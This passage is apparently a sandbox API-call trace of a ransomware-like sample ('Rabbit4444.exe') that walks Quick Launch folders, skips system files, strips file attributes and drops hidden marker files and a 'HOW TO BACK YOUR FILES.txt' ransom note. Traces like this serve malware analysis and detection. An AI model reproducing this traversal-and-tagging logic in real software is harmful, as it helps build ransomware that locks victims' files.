(lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Microsoft Outlook.lnk", dwFileAttributes=0x0) returned 1 [0053.047] lstrlenW (lpString="Microsoft Outlook.lnk") returned 21 [0053.047] lstrlenW (lpString="Rabbit4444") returned 10 [0053.047] lstrcmpiW (lpString1="utlook.lnk", lpString2="Rabbit4444") returned 1 [0053.047] lstrlenW (lpString=".dll") returned 4 [0053.047] lstrcmpiW (lpString1=".lnk", lpString2=".dll") returned 1 [0053.047] lstrlenW (lpString=".lnk") returned 4 [0053.047] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0053.047] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2111f8cb, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x2111f8cb, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x61d67afb, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x160, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Shows Desktop.lnk", cAlternateFileName="SHOWSD~1.LNK")) returned 1 [0053.047] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0053.047] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.047] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="Rabbit4444.exe") returned 1 [0053.047] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2=".") returned 1 [0053.047] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="..") returned 1 [0053.047] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="windows") returned -1 [0053.047] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="bootmgr") returned 1 [0053.047] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="pagefile.sys") returned 1 [0053.047] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="boot") returned 1 [0053.047] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="ids.txt") returned 1 [0053.047] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="NTUSER.DAT") returned 1 [0053.047] lstrcpyW (in: lpString1=0x130ebca, lpString2="Shows Desktop.lnk" | out: lpString1="Shows Desktop.lnk") returned="Shows Desktop.lnk" [0053.047] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk", dwFileAttributes=0x0) returned 1 [0053.048] lstrlenW (lpString="Shows Desktop.lnk") returned 17 [0053.048] lstrlenW (lpString="Rabbit4444") returned 10 [0053.048] lstrcmpiW (lpString1="esktop.lnk", lpString2="Rabbit4444") returned -1 [0053.048] lstrlenW (lpString=".dll") returned 4 [0053.048] lstrcmpiW (lpString1=".lnk", lpString2=".dll") returned 1 [0053.048] lstrlenW (lpString=".lnk") returned 4 [0053.048] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0053.048] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3bf8be86, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xac3ebde6, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xac3ebde6, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="User Pinned", cAlternateFileName="USERPI~1")) returned 1 [0053.048] lstrcmpiW (lpString1="User Pinned", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0053.048] lstrcmpiW (lpString1="User Pinned", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.048] lstrcmpiW (lpString1="User Pinned", lpString2="Rabbit4444.exe") returned 1 [0053.048] lstrcmpiW (lpString1="User Pinned", lpString2=".") returned 1 [0053.048] lstrcmpiW (lpString1="User Pinned", lpString2="..") returned 1 [0053.048] lstrcmpiW (lpString1="User Pinned", lpString2="windows") returned -1 [0053.048] lstrcmpiW (lpString1="User Pinned", lpString2="bootmgr") returned 1 [0053.048] lstrcmpiW (lpString1="User Pinned", lpString2="pagefile.sys") returned 1 [0053.048] lstrcmpiW (lpString1="User Pinned", lpString2="boot") returned 1 [0053.048] lstrcmpiW (lpString1="User Pinned", lpString2="ids.txt") returned 1 [0053.048] lstrcmpiW (lpString1="User Pinned", lpString2="NTUSER.DAT") returned 1 [0053.049] lstrcpyW (in: lpString1=0x130ebca, lpString2="User Pinned" | out: lpString1="User Pinned") returned="User Pinned" [0053.049] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6408 [0053.049] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xaa) returned 0x10a2f0 [0053.049] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6410 | out: ListHead=0xf68b0, ListEntry=0xf6410) returned 0xf63b0 [0053.049] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2111f8cb, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x2111f8cb, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x61d8dd66, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x14e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Window Switcher.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 1 [0053.049] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0053.049] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.049] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="Rabbit4444.exe") returned 1 [0053.049] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2=".") returned 1 [0053.049] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="..") returned 1 [0053.049] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="windows") returned -1 [0053.049] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="bootmgr") returned 1 [0053.049] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="pagefile.sys") returned 1 [0053.049] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="boot") returned 1 [0053.049] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="ids.txt") returned 1 [0053.049] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="NTUSER.DAT") returned 1 [0053.049] lstrcpyW (in: lpString1=0x130ebca, lpString2="Window Switcher.lnk" | out: lpString1="Window Switcher.lnk") returned="Window Switcher.lnk" [0053.049] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk", dwFileAttributes=0x0) returned 1 [0053.049] lstrlenW (lpString="Window Switcher.lnk") returned 19 [0053.049] lstrlenW (lpString="Rabbit4444") returned 10 [0053.049] lstrcmpiW (lpString1="itcher.lnk", lpString2="Rabbit4444") returned -1 [0053.049] lstrlenW (lpString=".dll") returned 4 [0053.049] lstrcmpiW (lpString1=".lnk", lpString2=".dll") returned 1 [0053.049] lstrlenW (lpString=".lnk") returned 4 [0053.049] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0053.049] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2111f8cb, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x2111f8cb, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x61d8dd66, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x14e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Window Switcher.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 0 [0053.050] FindClose (in: hFindFile=0x102990 | out: hFindFile=0x102990) returned 1 [0053.050] lstrcpyW (in: lpString1=0x130ebca, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0053.050] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0053.050] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0053.050] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0053.051] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.051] CloseHandle (hObject=0x278) returned 1 [0053.051] CloseHandle (hObject=0x27c) returned 1 [0053.051] GetCurrentThreadId () returned 0xd98 [0053.051] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6410 [0053.051] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned" [0053.051] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10a2f0 | out: hHeap=0xe0000) returned 1 [0053.051] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6408 | out: hHeap=0xe0000) returned 1 [0053.051] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned" [0053.051] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\" [0053.051] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\.BFC0E91B00AE8A0620D3" [0053.051] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0053.052] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0053.055] FlushFileBuffers (hFile=0x27c) returned 1 [0053.056] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0053.056] CloseHandle (hObject=0x27c) returned 1 [0053.056] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned") returned 84 [0053.056] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0053.056] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3bf8be86, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xac3ebde6, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xe8f21f20, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102910 [0053.056] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.056] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.056] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0053.057] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0053.057] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3bf8be86, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xac3ebde6, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xe8f21f20, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.057] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.057] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.057] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0053.057] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0053.057] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0053.057] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8f21f20, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8f21f20, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8f21f20, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0053.057] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.057] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0053.057] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x441842cf, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd3853abd, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x441842cf, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ImplicitAppShortcuts", cAlternateFileName="IMPLIC~1")) returned 1 [0053.057] lstrcmpiW (lpString1="ImplicitAppShortcuts", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0053.057] lstrcmpiW (lpString1="ImplicitAppShortcuts", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.057] lstrcmpiW (lpString1="ImplicitAppShortcuts", lpString2="Rabbit4444.exe") returned -1 [0053.057] lstrcmpiW (lpString1="ImplicitAppShortcuts", lpString2=".") returned 1 [0053.057] lstrcmpiW (lpString1="ImplicitAppShortcuts", lpString2="..") returned 1 [0053.057] lstrcmpiW (lpString1="ImplicitAppShortcuts", lpString2="windows") returned -1 [0053.057] lstrcmpiW (lpString1="ImplicitAppShortcuts", lpString2="bootmgr") returned 1 [0053.057] lstrcmpiW (lpString1="ImplicitAppShortcuts", lpString2="pagefile.sys") returned -1 [0053.057] lstrcmpiW (lpString1="ImplicitAppShortcuts", lpString2="boot") returned 1 [0053.057] lstrcmpiW (lpString1="ImplicitAppShortcuts", lpString2="ids.txt") returned 1 [0053.057] lstrcmpiW (lpString1="ImplicitAppShortcuts", lpString2="NTUSER.DAT") returned -1 [0053.057] lstrcpyW (in: lpString1=0x130ebe2, lpString2="ImplicitAppShortcuts" | out: lpString1="ImplicitAppShortcuts") returned="ImplicitAppShortcuts" [0053.057] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6408 [0053.057] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd4) returned 0xef950 [0053.057] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6410 | out: ListHead=0xf68b0, ListEntry=0xf6410) returned 0xf63b0 [0053.057] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xbf8c33d8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd38540c2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe79990a9, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TaskBar", cAlternateFileName="")) returned 1 [0053.057] lstrcmpiW (lpString1="TaskBar", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0053.057] lstrcmpiW (lpString1="TaskBar", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.057] lstrcmpiW (lpString1="TaskBar", lpString2="Rabbit4444.exe") returned 1 [0053.057] lstrcmpiW (lpString1="TaskBar", lpString2=".") returned 1 [0053.057] lstrcmpiW (lpString1="TaskBar", lpString2="..") returned 1 [0053.057] lstrcmpiW (lpString1="TaskBar", lpString2="windows") returned -1 [0053.058] lstrcmpiW (lpString1="TaskBar", lpString2="bootmgr") returned 1 [0053.058] lstrcmpiW (lpString1="TaskBar", lpString2="pagefile.sys") returned 1 [0053.058] lstrcmpiW (lpString1="TaskBar", lpString2="boot") returned 1 [0053.058] lstrcmpiW (lpString1="TaskBar", lpString2="ids.txt") returned 1 [0053.058] lstrcmpiW (lpString1="TaskBar", lpString2="NTUSER.DAT") returned 1 [0053.058] lstrcpyW (in: lpString1=0x130ebe2, lpString2="TaskBar" | out: lpString1="TaskBar") returned="TaskBar" [0053.058] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar", dwFileAttributes=0x10) returned 1 [0053.058] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6488 [0053.058] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xba) returned 0x10a2f0 [0053.058] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6490 | out: ListHead=0xf68b0, ListEntry=0xf6490) returned 0xf6410 [0053.058] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xbf8c33d8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd38540c2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe79990a9, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TaskBar", cAlternateFileName="")) returned 0 [0053.058] FindClose (in: hFindFile=0x102910 | out: hFindFile=0x102910) returned 1 [0053.058] lstrcpyW (in: lpString1=0x130ebe2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0053.058] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0053.060] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0053.060] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0053.060] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.061] CloseHandle (hObject=0x278) returned 1 [0053.061] CloseHandle (hObject=0x27c) returned 1 [0053.061] GetCurrentThreadId () returned 0xd98 [0053.061] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6490 [0053.061] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar" [0053.061] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10a2f0 | out: hHeap=0xe0000) returned 1 [0053.061] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6488 | out: hHeap=0xe0000) returned 1 [0053.061] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar" [0053.061] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\" [0053.061] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\.BFC0E91B00AE8A0620D3" [0053.061] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0053.062] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0053.064] FlushFileBuffers (hFile=0x27c) returned 1 [0053.065] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0053.065] CloseHandle (hObject=0x27c) returned 1 [0053.066] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar") returned 92 [0053.066] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0053.066] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf8c33d8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd38540c2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe8f21f20, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102910 [0053.066] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.066] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.066] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0053.066] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0053.066] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf8c33d8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd38540c2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe8f21f20, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.066] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.066] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.066] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0053.066] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0053.066] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0053.066] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8f21f20, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8f21f20, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8f4802e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, 